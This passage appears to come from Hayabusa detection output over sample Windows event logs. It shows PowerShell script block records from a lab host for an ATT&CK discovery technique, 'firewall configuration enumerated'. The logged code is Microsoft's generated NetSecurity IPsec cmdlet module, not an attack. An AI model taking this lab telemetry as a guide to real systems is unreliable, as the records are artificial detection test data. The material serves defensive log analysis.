($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase2AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 